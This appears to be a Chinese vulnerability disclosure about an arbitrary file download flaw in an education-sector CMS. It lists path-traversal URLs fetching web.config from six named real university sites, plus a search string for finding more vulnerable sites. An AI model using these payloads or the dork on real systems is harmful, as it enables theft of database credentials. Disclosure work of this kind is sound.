某教育类通用cms任意文件下载漏洞

### 简要描述： 某教育类通用cms任意文件下载漏洞 ### 详细说明： 不知道算不算通用 可下载web.config文件，数据库信息文件泄露 http://sbc.xzit.edu.cn/hxjc/DownLoad.aspx?Accessory=../web.config http://hedds.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://www.emcjs.org/DownLoad.aspx?Accessory=../web.config http://labyuanlin.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://artlab.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://xygq.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config 百度搜索：技术支持:南京先极科技有限公司 大部分都存在该漏洞 ### 漏洞证明： 可下载web.config文件，数据库信息文件泄露 http://sbc.xzit.edu.cn/hxjc/DownLoad.aspx?Accessory=../web.config http://hedds.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://www.emcjs.org/DownLoad.aspx?Accessory=../web.config http://labyuanlin.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://artlab.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://xygq.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config [<img src="https://images.seebug.org/upload/201407/17114303d48f4b7e8300f4c060bdf8c6517ea586.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/17114303d48f4b7e8300f4c060bdf8c6517ea586.jpg) 百度搜索：技术支持:南京先极科技有限公司 大部分都存在该漏洞